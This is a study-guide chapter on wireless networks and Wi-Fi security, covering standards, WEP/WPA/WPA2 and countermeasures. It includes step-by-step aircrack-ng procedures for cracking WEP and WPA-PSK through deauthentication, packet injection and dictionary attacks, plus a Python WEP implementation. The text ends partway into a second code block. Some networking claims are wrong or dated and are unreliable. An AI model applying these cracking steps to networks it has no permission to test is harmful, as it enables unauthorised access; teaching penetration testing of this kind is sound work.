Hacking Wireless Networks
In this chapter, we will learn about wireless networks, various types of wireless networks, Wi-Fi
authentication modes, and types of wireless encryption. This chapter focuses on wireless hacking
methodology, Bluetooth hacking, and Wireless penetration testing.
15.1 Understand wireless networks, various types of wireless networks, and Wi-Fi authentication modes
Exam Focus: Understand wireless networks, various types of wireless networks, and Wi-Fi authentication modes. Objective includes:
• Understand wireless networks.
• Gain insights on wireless networks.
• Understand various types of wireless networks.
• Understand Wi-Fi authentication modes.
Wireless network
A wireless network refers to any type of computer network that is wireless, and is commonly
associated with a telecommunications network whose interconnections between nodes are
implemented without the use of wires. Wireless telecommunications networks are generally
implemented with some type of remote information transmission system that uses
electromagnetic waves, such as radio waves, for the carrier and this implementation usually takes
place at the physical level or "layer" of the network.
Wi-Fi
Wi-Fi was developed on the IEEE 802.11 standard. It is widely used in wireless communication.
It is used to provide wireless access to applications and data across a radio network. Wi-Fi
establishes different ways to set up a connection between the transmitter and the receiver such as
DSSS, FHSS, Infrared, and OFDM. The following are the advantages of wireless networks:
• Installation is fast and easy, and it eliminates wiring through walls and ceilings.
• It is easier to provide connectivity in places where laying cable is difficult.
• The network can be accessed from anywhere within the range of an access point.
• Constant Internet connections using wireless LAN are used in public places such as airports, libraries, and schools.
The following are the disadvantages of wireless networks:
• Wireless networks are not very secure.
• The bandwidth suffers as the number of computers on the network increases.
• Some electronic equipment can interfere with Wi-Fi networks.
Wireless terminologies
Some important wireless terminologies are given below:
• GSM: A standard developed by the European Telecommunications Standards Institute (ETSI) that defines protocols for 2G digital cellular networks used by mobile phones.
• Directional antenna: Sends and receives signals from a specific direction.
• Omni-directional antenna: A vertical antenna system that sends or receives signals in all directions.
• Wi-Fi Finder: A tool used to find a Wi-Fi network.
• Association: The process of connecting a wireless device to an access point.
• Authentication: The process of identifying a device before allowing it to access the network resources.
• BSSID: An identifier used to identify a particular BSS (Basic Service Set) within an area.
• WPA: An advanced security protocol for WLAN. It uses TKIP, MIC, and AES encryption.
• WEP: A security protocol for WLANs. It has two components, authentication and encryption.
• Gigahertz: A unit of frequency equal to one thousand million hertz (1,000,000,000 Hz).
• Hotspot: A place where a wireless network is available for public use.
• Access point: A device that connects wireless devices to a wireless network.
• ISM band: A frequency band that is reserved internationally for the use of radio frequency (RF) energy for industrial, scientific, and medical purposes other than communications.
• Bandwidth: A measurement of how much data can be sent in a period of time.
Types of wireless networks
The following are types of wireless networks:
• WPAN: WPAN is a wireless personal area network that interconnects devices centered on an individual person's workspace. A wireless personal area network uses a technology that permits communication within a range of 20 feet. WPAN operates at frequencies of around 2.4 GHz in digital modes and supports only eight active devices. It is defined in the IEEE 802.15 standard. Bluetooth is an example of a wireless personal area network.
• WLAN: A wireless LAN (or WLAN, for wireless local area network, sometimes referred to as LAWN, for local area wireless network) is one in which a mobile user can connect to a local area network (LAN) through a wireless (radio) connection. IEEE 802.11 is a group of standards that specifies the technologies for wireless LANs. 802.11 standards use the Ethernet protocol and CSMA/CA (carrier sense multiple access with collision avoidance) for path sharing and include an encryption method, the Wired Equivalent Privacy algorithm. High-bandwidth allocation for wireless will make possible a relatively low-cost wiring of classrooms in the United States. A similar frequency allocation has been made in Europe. Hospitals and businesses are also expected to install wireless LAN systems where existing LANs are not already in place.
• WMAN: A Wireless Metropolitan Area Network (WMAN) is a wireless network that connects two or more wireless LANs in the same geographical area. WMANs are used as backbone services as well as point-to-point and point-to-multipoint links, which are implemented using high-speed connections such as T1, T3, etc. WMAN is also known as a Wireless Local Loop (WLL). WMANs are defined in the IEEE 802.16 standard. An example of a Wireless Metropolitan Area Network is WiMAX, which provides last-mile access as an alternative to broadband services such as DSL or cable connections. WiMAX provides fixed, roaming, portable and soon mobile wireless broadband connectivity without the need for a direct line of sight to a base station.
• WWAN: WWAN, which stands for Wireless Wide Area Network, is a form of wireless network. A WWAN differs from a WLAN (wireless LAN) in that it uses mobile telecommunication cellular network technologies, such as WiMAX (though it is better applied to WMAN networks), UMTS, GPRS, CDMA2000, GSM, CDPD, Mobitex, HSDPA, or 3G to transfer data. It can also use LMDS and Wi-Fi to connect to the Internet. These cellular technologies are offered regionally, nationwide, or even globally and are provided by a wireless service provider, typically on a paid basis. This type of connectivity allows a user with a laptop and a WWAN card to surf the web, check email, or connect to a Virtual Private Network (VPN) from anywhere within the regional boundaries of cellular service. Various computers now have integrated WWAN capabilities (such as HSDPA in Centrino). This means that the system has a cellular radio (GSM/CDMA) built in, which allows the user to send and receive data.
WLAN summarized!
Wireless Local Area Network (WLAN) is a network that enables devices to connect to the
network wirelessly. WLAN uses radiated energy, commonly called high-frequency radio waves,
to communicate amongst nodes.
Organizations that Influence WLAN Standards
The four major organizations that set or influence WLAN standards are described below:
• ITU-R: The International Telecommunications Union-Radio communication (ITU-R) is a worldwide organization of the United Nations. It works for the standardization of communications that use radiated energy. Its prime objective is to manage the assignment of frequencies.
• IEEE: The Institute of Electrical and Electronics Engineers (IEEE) is a society of technical professionals. It promotes the development and application of electro-technology and allied sciences. IEEE develops communications and network standards, among other activities. The organization publishes a number of journals. The organization has many local chapters and societies in specialized areas.
• Wi-Fi Alliance: The Wi-Fi Alliance is an industry consortium that encourages interoperability of products that use WLAN standards. The consortium runs a certification program and recognizes products that implement WLAN standards as Wi-Fi certified products.
• FCC: The Federal Communications Commission (FCC) is an independent US government agency. It regulates interstate and international communications by radio, television, wire, satellite, and cable in the United States of America.
Modes of Wireless LANs
There are two modes of WLANs: ad hoc mode and infrastructure mode.
Ad hoc mode WLAN: An ad hoc network consists of two or more wireless devices that
communicate directly with each other. The wireless local area network (WLAN) network
interface adapters in the wireless devices generate omni-directional signals within a limited range
called Basic Service Area (BSA). When two wireless devices come within the range of each
other, they immediately form a two-node network and are able to communicate with each other.
An ad hoc network is non-transitive.
Infrastructure mode WLAN: An infrastructure network consists of an access point that
connects wireless devices to the standard cable network. An access point is connected to a cabled
network through a cable and it generates omni-directional signals. When wireless devices come
within the range of the access point, they are able to communicate with the cabled local area
network.
The access point works as a central bridge device to include wireless devices in the cabled LAN.
Wireless Technologies
802.11: This is the latest networking specification for wireless local area networks (WLANs), developed by the Institute of Electrical and Electronics Engineers. It contains several subspecifications, and the IEEE is constantly adding new specifications. This specification uses the Carrier Sense Multiple Access with Collision Avoidance (CSMA/CA) media access control mechanism. 802.11 supports 1 or 2 Mbps transmission in the 2.4 GHz ISM band using Frequency Hopping Spread Spectrum (FHSS).
802.11x: It contains various specifications for the 802.11 family of Wireless LAN network standards. Some of the specifications in this family are still under development. The 802.11b specification uses Direct Sequence Spread Spectrum (DSSS) and supports 11 Mbps transmission in the 2.4 GHz band.
Infrared: Infrared technology uses invisible infrared radiation to transmit signals over short distances. Two types of network communication are possible: one in which the sender and the receiver are visible to each other and situated in a straight line, known as line-of-sight mode; the other, known as diffuse mode, does not require the sender and receiver to be directly visible to each other. This technology is used in TV sets, cordless microphones, laptops, remote modems, printers, and other peripheral devices. Infrared networks use frequencies in the terahertz range and support transmission speeds of 1 to 2 Mbps.
Bluetooth: Bluetooth technology uses short-range radio frequencies to transmit voice and data signals at a speed of 1 Mbps on a frequency of 2.4 GHz. Bluetooth is used to automatically synchronize information among different types of computers such as desktops, laptops, and palmtops, or to connect to the Internet through a cell phone.
Important Protocols
WAP: Wireless Application Protocol (WAP) supports mobile computing. It was developed by
the WAP forum. The functionality of WAP is equivalent to that of TCP/IP. WAP uses a smaller
version of HTML called Wireless Markup Language (WML) to display Internet sites.
WEP: Wired Equivalent Privacy (WEP) is a security protocol for wireless local area networks (WLANs). It has two components, authentication and encryption. It is intended to give wireless networks security equivalent to that of wired networks. WEP encrypts data on a wireless network by using a fixed secret key. WEP incorporates a checksum in each frame to provide protection against attacks that attempt to reveal the key stream.
Infrastructure network
Infrastructure is a basic topology of a wireless network. An infrastructure network consists of an
access point that connects wireless devices to the standard cable network. An access point is
connected to the cabled network through a cable and it generates omni-directional signals. When
wireless devices come within the range of the access point, they are able to communicate with
the cabled local area network.
The access point works as a central bridge device to include wireless devices in the cabled LAN.
Wireless standards
The following are wireless standards:
• 802.11a: The IEEE 802.11a standard for WLAN uses the U-NII spectrum at 5 GHz. It uses the Orthogonal Frequency Division Multiplexing (OFDM) encoding class. The maximum speed supported by the 802.11a standard is 54 Mbps.
• 802.11b: 802.11b is an amendment to the IEEE 802.11 specification that extended the throughput up to 11 Mbit/s using the same 2.4 GHz band. This specification, under the marketing name of Wi-Fi, has been implemented across the world. 802.11b is used in a point-to-multipoint configuration, wherein an access point communicates via an omnidirectional antenna with one or more nomadic or mobile clients that are located in a coverage area around the access point.
• 802.11g: The 802.11g standard, defined by IEEE, is an extension to the 802.11b standard of a wireless network. It operates in the 2.4 GHz band and brings data rates up to 54 Mbps, using the Orthogonal Frequency-Division Multiplexing (OFDM) technology. Since the 802.11g standard is backward compatible with 802.11b, an 802.11b device can interface directly with an 802.11g access point.
• 802.11i: The 802.11i standard of IEEE specifies the security mechanisms for Wireless LAN (WLAN). The standard includes authentication and encryption.
• 802.11n: IEEE 802.11n is an upcoming improvement to the IEEE 802.11-2007 wireless networking standard to improve the network throughput over previous standards, such as 802.11b and 802.11g. The IEEE 802.11n standard offers data rates from 54 Mbps to a maximum of 600 Mbps. The current state of the art supports a physical rate of 450 Mbps, with the use of 3 spatial streams at a channel width of 40 MHz. Depending on the environment, this may translate into a user throughput of 110 Mbps.
• 802.16: IEEE 802.16 is a set of Wireless Broadband standards authorized by the IEEE. It was written by a working group of the IEEE Standards Board formed in 1999 to develop standards for the global deployment of broadband Wireless Metropolitan Area Networks. The working group is a unit of the IEEE 802 LAN/MAN Standards Committee. The IEEE 802.16 standard is also known as the wireless metropolitan area network (WirelessMAN) standard.
• Bluetooth: Bluetooth supports a very short range (10 meters) and relatively low bandwidth (1-3 Mbps). It is designed for low-power network devices.
IEEE 802 Members
The Institute of Electrical and Electronics Engineers (IEEE) is a leading organization in the world. It constituted a task force to set standards for connectivity between the NIC and transmission media. This task force is known as the 802 committee. The 802 committee was subdivided into several subgroups, and each group is responsible for the implementation of a single standard that specifies the data transfer that occurs at the data link layer of the OSI model. A brief description of these subgroups is given below:
802.1
This standard is responsible for data communication between all seven layers of the OSI model.
802.2
It defines the LLC (Logical Link Control) sublayer of the data link layer that is used by lower layer protocols.
802.3
The 802.3 standard defines Ethernet and the functions related to the MAC (medium access control) sublayer of the data link layer. There are different types of transmission media in 802.3:
• 1BASE5: The data transfer rate is 1 Mbps and it uses UTP cable with a signal range up to 500 meters. In this standard, the star topology is used.
• 10BASE5: It is also known as thick Ethernet and it supports a data transfer rate of 10 Mbps with a signal range up to 500 meters. In this standard, coaxial thicknet cable is implemented.
• 10BASE2: It uses thinnet coaxial cable and has a data transfer speed of 10 Mbps. In this standard, the bus topology is used.
• 10BASE-F: It implements fiber optic cable. The data transfer rate is 10 Mbps.
Conceived in the 1960s, the Ethernet (802.3) is the oldest and most popular data link layer
protocol (or network technology) used in today's networks. Ethernet networks use a bus or star
topology and control the flow of data through the media access control (MAC) method known as
Carrier Sense Multiple Access Collision Detection (CSMA/CD). The use of CSMA/CD ensures
that each computer in a network can send its signals over the network. To send signals over the
network, a computer waits for the network to be free of any traffic. If the network is free, the
computer sends its signals that travel through the network and are received by the destination
computer. Sometimes more than one computer sends its signals over the network, which results
in a collision. Collisions in these types of networks cannot be avoided, as CSMA/CD can detect them only when they occur. It then resends the data over the network to compensate for the data loss.
Ethernet networks run at various speeds, depending on the type of topology and cabling used.
Ethernet technology is widely implemented in the star topology using coaxial or fiber optic
cables, and in the bus topology using UTP cable.
802.4
This defines a network with the bus topology that implements media access control with token
mechanism.
802.5
This defines a network with the ring topology. It uses media access control with a token mechanism. It supports data transfer rates of 1, 4, and 16 Mbps. Originally developed by IBM, the token ring is an intricate but highly dependable networking technology that follows the IEEE 802.5 standard. The type of topology used in this technology is physically a star, but implemented logically as a ring, in which all the computers are attached to a central unit called a multistation access unit (MAU or MSAU). Token ring networks use token passing to send their signals over the network. A token is a type of data packet that circulates around the entire network. If the token is free, the computer waiting to send data takes it, attaches the data and the destination address to the token, and sends it. When the token reaches its destination computer, the data is received. Then, the token gets back to the originator. If the originator finds that the message has been received, it removes the message from the token. Now, the token is free and can be used by other computers in the network to send data.
Token ring networks are more fault tolerant than the Ethernet, as the MSAU ensures that the
failure of a single computer does not bring the entire network down. It is an intelligent device,
which identifies the failing computer in the network, and then bypasses it to correct the errors.
The modern day token ring networks use unshielded twisted pair (UTP) cable and run at speeds
of 16 Mbps as opposed to the original token ring networks developed by IBM that used shielded
twisted pair (STP) cable and ran at 4 or 16 Mbps.
802.6
This describes the MAN standard known as Distributed Queue Dual Bus (DQDB). DQDB is designed for data, voice, and video transmission through fiber optic cable. The dual bus topology is employed and traffic on each bus is unidirectional.
802.8
This standard deals with the implementation of fiber optic technology in a networking environment.
802.11
The IEEE 802.11 standards define wireless local area network (WLAN) computer
communication in the 5GHz and 2.4GHz public spectrum bands. These specifications define an
over-the-air interface between a wireless client and a base station or access point. The 802.11
specifications also define standards among wireless clients. These specifications address both the
Physical (PHY) and Media Access Control (MAC) layers and are tailored to resolve
compatibility issues between manufacturers of wireless LAN equipment.
Apart from these IEEE standards, there is one more standard named FDDI developed by ANSI.
FDDI (Fiber Distributed Data Interface)
Developed by the American National Standards Institute (ANSI), FDDI is a ring-based network
that uses fiber optic cables to provide very fast and reliable communication between the
connected computers. It uses token passing to control the network access but does not use a hub
like the token ring networks; instead, it uses a central device called a concentrator to connect the
computers in the network. In these networks, the computers are connected using a physical ring
topology.
There are two types of configurations used by FDDI networks, namely class A and class B
configurations. In class A, a double ring topology is used in which the computers are connected
to two rings. The signals travel in the opposite directions on both the rings. If there is a fault in
one ring, the receiving computer can still receive the signal through the other ring. These
networks provide a better fault tolerance. Class B networks use a single physical ring and are,
therefore, less fault tolerant.
FDDI networks run at speeds of 100 Mbps and, as they use fiber optic cables, provide
connectivity over long distances. These networks have now been replaced by Fast Ethernet
networks that provide the same speed and are more fault tolerant.
SSID
SSID stands for Service Set Identifier. It is used to identify a wireless network. SSIDs are case
sensitive text strings and have a maximum length of 32 characters. All wireless devices on a
wireless network must have the same SSID in order to communicate with one another. The SSID on computers and devices in a WLAN (Wireless Local Area Network) can be set manually or automatically.
Configuring the same SSID as that of the other Wireless Access Points (WAPs) of other
networks will create a conflict. A network administrator often uses a public SSID that is set on
the access point. The access point broadcasts SSID to all wireless devices within its range. Some
newer wireless access points have the ability to disable the automatic SSID broadcast feature in
order to improve network security.
Wi-Fi authentication modes
The open system authentication process includes the following steps:
1. A client sends an 802.11 authentication management frame that includes its SSID.
2. Access Point (AP) checks the client's SSID and sends back an authentication verification
frame.
3. The client connects to the network.
The shared key authentication process includes the following steps:
1. A client trying to connect sends an authentication request to the Access Point (AP).
2. The AP sends challenge text.
3. The client encrypts the challenge text and sends it back to the AP.
4. The AP decrypts the challenge text and authenticates the client.
5. The client connects to the network.
Wi-Fi authentication process
The Wi-Fi authentication process includes the following steps:
1. The AP issues a challenge to the wireless client. The wireless client responds with its identity.
2. The AP forwards the identity to the RADIUS server using the uncontrolled port.
3. The RADIUS server sends a request to the wireless station through the AP specifying the
authentication mechanism to be used.
4. The wireless station responds to the RADIUS server with its credentials through the AP.
5. The RADIUS server sends an encrypted authentication key to the AP if the credentials
are acceptable.
6. The AP generates a multicast/global authentication key encrypted with a per-station
unicast session key and transmits it to the wireless station.
Wi-Fi authentication process using a centralized authentication server
The Wi-Fi authentication process using a centralized authentication server includes the following steps:
1. A client requests a connection from the Access Point (AP).
2. The AP sends an EAP-request for identity to the client.
3. The client sends an EAP-response with its identity to the AP.
4. The AP forwards the identity to the RADIUS server using the uncontrolled port.
5. The RADIUS server sends a request to the wireless client through the AP specifying the authentication mechanism to be used.
6. The wireless client responds to the RADIUS server with its credentials through the AP.
7. The RADIUS server sends an encrypted authentication key to the AP if the credentials are acceptable.
8. The AP sends a multicast/global authentication key encrypted with a per-station unicast session key.
Wi-Fi chalking
Some examples of Wi-Fi chalking are as follows:
• Wardriving: Wardriving is a technique used to locate insecure wireless networks while driving around. The following are wardriving tools:
  o StumbVerter
  o MiniStumbler
  o ApSniff
  o Driftnet
  o WiFiFoFum
  o WarLinux
• Warflying: Warflying is similar to wardriving. It involves flying around in an aircraft, searching for open wireless networks.
• Warchalking: Warchalking is the drawing of symbols in public places to advertise an open Wi-Fi wireless network. Having found a Wi-Fi node, the warchalker draws a special symbol on a nearby object, such as a wall, the pavement, or a lamp post. The name warchalking is derived from the cracker terms war dialing and war driving.
• Warwalking: Warwalking is a technique similar to wardriving. It is the act of walking around with a Wi-Fi enabled laptop to find an access point for a wireless network.
Wi-Fi chalking symbols
The chalk symbols indicate the following:
• Free Wi-Fi
• Wi-Fi with MAC filtering
• Restricted Wi-Fi
• Pay for Wi-Fi
• Wi-Fi with WPA
• Wi-Fi with multiple access controls
• Wi-Fi with closed SSID
• Wi-Fi honeypot
Types of wireless antenna
The following are types of wireless antenna:
• Omni-directional antenna: It is a vertical antenna system which sends or receives signals in all directions. Signals generated through an omni antenna lose power as the distance increases. Such antennas are used with Wireless Access Points (WAPs).
• Parabolic antenna: A parabolic antenna is a high gain reflector antenna used for radio, television, and data communications. It is the most efficient type of directional antenna. It provides a large front/back ratio, a very sharp radiation angle, and small side lobes. The relatively short wavelengths of electromagnetic radiation at these frequencies allow reasonably sized reflectors to exhibit the desired highly directional response for both receiving and transmitting. It is the best choice for noisy locations where other antennas probably do not work.
• Yagi antenna: It is a directional antenna. It comprises a dipole, a reflector, which is an element bigger than the dipole, and one or more shorter elements as directors in front of the dipole.
• Dipole antenna: It is an antenna that can be made by a simple wire with a center-fed driven element for transmitting or receiving radio frequency energy. This antenna is simply a pair of two wires pointed in opposite directions, arranged either horizontally or vertically, with one end of each wire connected to the radio and the other end hanging free in space. Since this is the simplest practical antenna, it is also used as a reference model for other antennas. The current amplitude on such an antenna decreases uniformly from maximum at the center to zero at the ends.
MAC filtering
MAC filtering is a security access control technique that allows specific network devices to access the network or prevents them from accessing it. MAC filtering can also be used on a wireless network to prevent certain network devices from accessing the wireless network. MAC addresses are allocated only to hardware devices, not to persons.
15.2 Identify types of wireless encryption, and understand WEP encryption and WPA/WPA2
Exam Focus: Identify types of wireless encryption, and understand WEP encryption and WPA/WPA2. Objective includes:
• Identify types of wireless encryption.
• Understand WEP encryption.
• Understand WPA/WPA2.
• Discuss wireless threats.
Types of wireless encryption
The following are the types of wireless encryption:
• WEP: It is the old and original wireless security standard. It can be cracked easily.
• WPA: It uses a 48-bit Initialization Vector (IV), a 32-bit CRC, and TKIP encryption for wireless security.
• WPA2: It is used to provide network administrators with a high level of assurance that only authorized users are able to access the network. It provides government grade security by implementing the National Institute of Standards and Technology (NIST) FIPS 140-2 compliant AES encryption algorithm.
• WPA2 Enterprise: It integrates the EAP standard with WPA encryption.
• TKIP: It is a security protocol used in WPA as a replacement for WEP.
• AES: It is a symmetric-key encryption algorithm. It is used in WPA2 as a replacement for TKIP.
• EAP: It supports multiple authentication methods.
• LEAP: It is a proprietary WLAN authentication protocol.
• RADIUS: It is a centralized authentication and authorization management system.
• 802.11i: It is an IEEE standard that specifies security mechanisms for 802.11 wireless networks.
• CCMP: It uses 128-bit keys with a 48-bit IV for replay protection.
WEP
WEP stands for Wired Equivalent Privacy. It is a wireless security standard that uses either 64-bit or 128-bit encryption. It is the most commonly and widely accepted security standard. Almost all available operating systems, wireless access points, and wireless bridges support this security standard. WEP uses a 24-bit initialization vector with the RC4 stream cipher for confidentiality and the CRC-32 checksum for the integrity of wireless transmissions. It has major vulnerabilities and design flaws.
The following is the working of WEP:
1. For the frame data, a 32-bit Integrity Check Value (ICV) is calculated.
2. The ICV is added at the end of the frame data.
3. A 24-bit Initialization Vector is produced and added to the WEP encryption key.
4. To generate a key stream, the combination of the Initialization Vector and the WEP key is used as the input to the RC4 algorithm.
5. To produce the encrypted data, the key stream is bit-wise XORed with the combination of data and ICV.
6. To generate a MAC frame, the Initialization Vector is added to the encrypted data and ICV.
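The six encapsulation steps above and the shared key authentication exchange from section 15.1, worked through as an added Python example that is not code from the study guide; the 40-bit key, the IVs and the frame contents are constructed sample values, key index 0 is assumed for the key-id byte, and the IV-reuse report at the end is a monitoring check a defender can run over captured frame bodies.

```python
import os
import struct
import zlib
from collections import Counter

# Added example, not from the study guide. Key, IVs and frame contents are
# constructed sample values; key index 0 is assumed for the key-id byte.


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key scheduling plus PRGA; returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):                                  # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(length):                               # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """Step 1: the 32-bit Integrity Check Value, CRC-32 of the data (little-endian)."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encapsulate(wep_key: bytes, iv: bytes, data: bytes) -> bytes:
    """Steps 2-6: append the ICV, seed RC4 with IV || key, XOR, prepend the IV."""
    if len(iv) != 3:
        raise ValueError("the WEP IV is 24 bits")
    if len(wep_key) not in (5, 13):          # 40- or 104-bit key (64/128 with the IV)
        raise ValueError("WEP keys are 40 or 104 bits")
    plaintext = data + icv(data)                                      # step 2
    keystream = rc4_keystream(iv + wep_key, len(plaintext))           # steps 3-4
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, keystream))   # step 5
    key_id = b"\x00"                                                  # key index 0 (assumed)
    return iv + key_id + ciphertext               # step 6: the IV travels in the clear


def wep_decapsulate(wep_key: bytes, frame_body: bytes):
    """Reverse the encapsulation; return the data, or None when the ICV does not match."""
    iv, ciphertext = frame_body[:3], frame_body[4:]
    if len(ciphertext) < 4:
        return None
    keystream = rc4_keystream(iv + wep_key, len(ciphertext))
    plaintext = bytes(c ^ k for c, k in zip(ciphertext, keystream))
    data, received_icv = plaintext[:-4], plaintext[-4:]
    return data if icv(data) == received_icv else None


# Shared key authentication (section 15.1): the AP sends challenge text, the client
# returns it WEP-encrypted, the AP decrypts and compares. A station without the
# key cannot produce a frame that passes the ICV check and carries the challenge.
def ap_challenge() -> bytes:
    return os.urandom(128)                     # 802.11 challenge text is 128 bytes


def client_response(wep_key: bytes, challenge: bytes) -> bytes:
    return wep_encapsulate(wep_key, os.urandom(3), challenge)


def ap_verify(wep_key: bytes, challenge: bytes, response: bytes) -> bool:
    return wep_decapsulate(wep_key, response) == challenge


def iv_reuse_report(frame_bodies) -> dict:
    """Monitoring check: IVs seen more than once across captured frame bodies.
    Every repeat means two frames were protected with the same RC4 keystream."""
    counts = Counter(body[:3] for body in frame_bodies)
    return {iv_bytes: n for iv_bytes, n in counts.items() if n > 1}


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")          # constructed 40-bit key
    frames = [wep_encapsulate(key, bytes([0, 0, n % 2]), b"frame %d" % n)
              for n in range(4)]
    print(wep_decapsulate(key, frames[0]))     # b'frame 0'
    challenge = ap_challenge()
    print(ap_verify(key, challenge, client_response(key, challenge)))  # True
    print(iv_reuse_report(frames))             # two IVs, each used twice
```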
WEP issues
The following are WEP issues:
• The Initialization Vector is a 24-bit field and is sent in the cleartext portion of a message.
• There is no defined method for encryption key distribution.
• Reuse of the same IV for data protection produces identical key streams. Key streams are repeated within a short time because the Initialization Vector is short.
• The same Initialization Vector may be generated by wireless adapters from the same vendor. This may help attackers to determine the key stream and decrypt the ciphertext.
• It is difficult to change WEP keys regularly due to the lack of centralized key management.
• Association and disassociation messages are not authenticated.
• The RC4 keystream can be reconstructed from the Initialization Vector (IV) and the decrypted payload of a packet when there is an IV collision.
• WEP does not provide cryptographic integrity protection. An attacker can capture two packets, flip a bit in the encrypted stream, and modify the checksum so that the altered packet is still accepted.
• The Initialization Vector is part of the RC4 encryption key, which enables an analytical attack. In the analytic attack, the key is recovered after intercepting and analyzing a relatively small amount of traffic.
• WEP is based on a password. The password can be cracked using password cracking attacks.
• An attacker can make and use a decryption table of the reconstructed keystream to decrypt WEP packets in real time.
Breaking WEP encryption
The following actions can be taken to break WEP encryption:
1. The wireless card should be started in monitor mode on the specific access point channel.
2. The injection capability of the wireless device towards the access point should be tested.
3. A Wi-Fi sniffing tool such as airodump-ng or Cain & Abel should be started with a bssid
filter to collect unique IVs.
4. A tool such as aireplay-ng should be used to perform a fake authentication with the access
point, so that the AP accepts injected frames from the attacker's MAC address.
5. A packet injection tool such as aireplay-ng should be started in ARP request replay mode to
inject packets and make the AP generate new IVs quickly.
6. A cracking tool such as Cain & Abel or aircrack-ng should be run to recover the encryption key
from the collected IVs.
Crack WEP using aircrack
Take the following steps to crack WEP using aircrack:
1. Put the wireless card into monitor mode with airmon-ng and collect wireless traffic data with
airodump-ng.
2. Associate your wireless card with the AP you are targeting using aireplay-ng (fake
authentication) and start packet injection with aireplay-ng.
3. Recover the WEP key from the captured IVs with aircrack-ng.
Countermeasures to prevent WEP cracking
WEP is the least secure protocol and it should not be used. Where it cannot be replaced, a user
can use the following methods to mitigate WEP cracking:
 Use a non-obvious key.
 Use the longest key supported by the hardware.
 Change keys often.
 Use WEP in combination with other security features, such as rapid WEP key rotation and
dynamic keying using 802.1X.
 Consider WEP a deterrent, not a guarantee.
WPA
WPA stands for Wi-Fi Protected Access. It is a wireless security standard that provides better
security than WEP (Wired Equivalent Privacy). Its encryption protocol, TKIP, uses the RC4 stream
cipher with a 128-bit temporal encryption key and a separate 64-bit key for the Michael message
integrity check. The WEP key derivation vulnerability is mitigated because TKIP never reuses an
Initialization Vector with the same RC4 key: the client starts with a 128-bit "temporal key" (TK),
which is mixed with the transmitter's MAC address and a 48-bit per-packet sequence counter (the
TKIP IV) to create a fresh key for encrypting each packet with RC4.
TKIP adds a rekeying mechanism to WEP to provide fresh encryption and integrity keys. Temporal
keys are changed every 10,000 packets, making TKIP-protected networks more resistant to
cryptanalytic attacks that involve key reuse.
The following is the working of WPA (TKIP):
1. The temporal encryption key, the transmit address, and the TKIP sequence counter are mixed
into a per-packet key, which is used as the input to the RC4 algorithm to generate a key stream.
2. The Michael algorithm computes a message integrity check (MIC) over the MAC Service Data Unit
(MSDU), and the MIC is appended to the MSDU.
3. The combination of MSDU and MIC is fragmented, if necessary, into MAC Protocol Data Units
(MPDUs).
4. For each MPDU, a 32-bit Integrity Check Value (ICV) is calculated.
5. The combination of MPDU and ICV is bitwise XORed with the key stream to produce the encrypted
data.
6. The Initialization Vector (the sequence counter) is prepended to the encrypted data to
generate the MAC frame.
Windows Vista supports both WPA-PSK and WPA-EAP:
 WPA-PSK: PSK stands for Pre-shared Key. This mode is meant for the home environment. WPA-PSK
requires a user to enter an 8-character to 63-character passphrase into a wireless client. WPA
converts the passphrase into a 256-bit key (the PMK), using the SSID as salt.
 WPA-EAP: EAP stands for Extensible Authentication Protocol. This mode relies on a back-end
server that runs Remote Authentication Dial-In User Service (RADIUS) for user authentication.
Note: Windows Vista allows a user to use a smart card to connect to a WPA-EAP protected network.
Temporal keys
In both WPA and WPA2, the encryption keys (temporal keys) are derived during the four-way
handshake from the Pairwise Master Key (PMK). In enterprise mode the PMK is derived during the
EAP authentication session: the authentication server delivers it to the AP together with the EAP
success message (inside the RADIUS Access-Accept), but it is never sent to the Wi-Fi client,
which has derived its own copy of the PMK from the same EAP exchange. In PSK mode the PMK is
derived from the passphrase on both sides.
Crack WPA-PSK using Aircrack
Take the following steps to crack WPA-PSK using Aircrack:
1. Put the wireless card into monitor mode with airmon-ng and collect wireless traffic data with
airodump-ng.
2. Deauthenticate a connected client using aireplay-ng. The client will re-authenticate with the
AP, and airodump-ng captures the resulting four-way handshake.
3. Run the capture file, together with a wordlist, through aircrack-ng.
Defend against WPA cracking
 Passphrases: The only material an attacker can sniff is the four-way handshake; the PMK itself
must be guessed from it offline. It is practically impossible to crack the passphrase if it is
extremely long and random.
 Passphrase complexity: A random passphrase that is not made up of dictionary words should be
selected. A complex passphrase with a minimum length of 20 characters should be selected and
changed at regular intervals.
 Client settings: WPA2 should only be used with AES/CCMP encryption. The client settings should
be set properly so that clients do not fall back to WEP or TKIP.
 Additional controls: Virtual private network technology such as Remote Access VPN, Extranet
VPN, Intranet VPN, etc. should be used. A Network Access Control (NAC) or Network Access
Protection (NAP) solution should be implemented for additional control over end-user
connectivity.
WPA2
WPA2 is an updated version of WPA that implements the full IEEE 802.11i standard, replacing
TKIP/RC4 with AES-CCMP. WPA2 offers stronger protection to wireless networks than the WPA and WEP
standards. It is also available as WPA2-PSK and WPA2-EAP (WPA2-Enterprise) for home and
enterprise environments, respectively.
Break WPA/WPA2 encryption
WPA-PSK derives its master key (PMK) from a user-defined passphrase. Because TKIP and CCMP use
per-packet keys, the traffic itself cannot be cracked the way WEP traffic can. However, the
passphrase can be brute-forced offline with a dictionary attack once a four-way handshake has
been captured.
WPA-PSK passphrases can be brute-forced using tools such as aircrack-ng (with aireplay-ng to
force a handshake) and KisMAC.
To capture the WPA/WPA2 authentication handshake, an attacker only needs to be near the AP for a
matter of seconds while a client connects (or is deauthenticated and reconnects). Once the right
packets have been captured, the passphrase can be cracked offline without any further contact
with the network.
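The derivation behind the WPA-PSK sections above (passphrase to 256-bit PMK, four-way handshake to PTK and MIC) and the offline dictionary attack that aircrack-ng performs on a captured handshake, as one added Python example. This is not code from the page or from aircrack-ng; the SSID, MAC addresses, nonces, EAPOL-Key body and wordlist are constructed for the demonstration, while the PBKDF2, PRF-512 and MIC computations follow IEEE 802.11i.

```python
import hashlib
import hmac
from dataclasses import dataclass


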